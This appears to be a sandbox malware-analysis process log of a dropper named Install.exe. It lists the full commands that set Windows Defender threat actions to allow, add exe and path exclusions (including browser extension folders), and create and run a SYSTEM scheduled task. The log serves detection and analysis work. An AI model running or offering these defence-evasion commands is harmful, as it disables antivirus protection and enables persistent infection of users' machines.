\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 67⤵PID:1436
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"5⤵
- Suspicious use of WriteProcessMemory
PID:4720 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 66⤵
- Suspicious use of WriteProcessMemory
PID:4960 -
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 67⤵PID:3160
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"5⤵
- Suspicious use of WriteProcessMemory
PID:3948 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 66⤵
- Suspicious use of WriteProcessMemory
PID:3140 -
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 67⤵PID:2684
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"5⤵
- Suspicious use of WriteProcessMemory
PID:3796 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 66⤵
- Suspicious use of WriteProcessMemory
PID:4412 -
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 67⤵PID:5012
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"5⤵
- Suspicious use of WriteProcessMemory
PID:3444 -
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force6⤵
- Suspicious use of WriteProcessMemory
PID:940 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5044 -
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force8⤵PID:3320
-
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"4⤵
- Suspicious use of WriteProcessMemory
PID:632 -
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True5⤵PID:4836
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2140 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True7⤵
- Suspicious use of AdjustPrivilegeToken
PID:2428
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "btZaCbGShXZoJDfvCg" /SC once /ST 01:31:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS3302.tmp\Install.exe\" PP /CoBdidvAFo 385120 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:4968
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn btZaCbGShXZoJDfvCg"4⤵PID:4436
-
C:\Windows\SysWOW64\cmd.exe/C schtasks /run /I /tn btZaCbGShXZoJDfvCg5⤵PID:624
-
\??\c:\windows\SysWOW64\schtasks.exeschtasks /run /I /tn btZaCbGShXZoJDfvCg6⤵PID:4520
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1284 -s 10364⤵
- Program crash
PID:4632
-
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=1036 --field-trial-handle=3240,i,13319578961094268484,16557498665191861597,262144 --variations-seed-version /prefetch:81⤵PID:4052
-
C:\Users\Admin\AppData\Local\Temp\7zS3302.tmp\Install.exeC:\Users\Admin\AppData\Local\Temp\7zS3302.tmp\Install.exe PP /CoBdidvAFo 385120 /S1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:3720 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"2⤵PID:5012
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"3⤵PID:3544
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 64⤵PID:4264
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵PID:4688
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"3⤵PID:4892
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 64⤵PID:3580
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵PID:3536
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"3⤵PID:3956
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 64⤵PID:3120
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵PID:2184
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"3⤵PID:608
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 64⤵PID:4944
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵PID:1688
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵PID:1432
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force4⤵PID:3672
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1492 -
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force6⤵PID:4316
-
-
-
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2032 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵PID:3948
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:4260
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:4080
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:1276
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:4376
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:2168
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:2528
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:3956
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:3544
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵PID:1384
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵PID:4656
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:540
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:3612
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:2196
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:380
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:4520
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:4652
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:3320
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:2320
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:3652
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:388
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:1484
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:1560
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵PID:2380
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:2348
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵PID:3828
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵PID:1348
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵PID:2476
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵PID:4752
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QtKEgKYoTGTqC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QtKEgKYoTGTqC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZEkGlaTFWGUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZEkGlaTFWGUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\dlfHiRefefjU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\dlfHiRefefjU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\hsUwQAlMU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\hsUwQAlMU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\nivjmgppGaMJQQVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\nivjmgppGaMJQQVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\QqEAMUespgTHJnVz\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\QqEAMUespgTHJnVz\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1404 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR" /t REG_DWORD /d 0 /reg:323⤵PID:1484
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR" /t REG_DWORD /d 0 /reg:324⤵PID:1560
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR" /t REG_DWORD /d 0 /reg:643⤵PID:2380
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QtKEgKYoTGTqC" /t REG_DWORD /d 0 /reg:323⤵PID:2348
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QtKEgKYoTGTqC" /t REG_DWORD /d 0 /reg:643⤵PID:3828
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZEkGlaTFWGUn" /t REG_DWORD /d 0 /reg:323⤵PID:1348
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZEkGlaTFWGUn" /t REG_DWORD /d 0 /reg:643⤵PID:1688
-
-
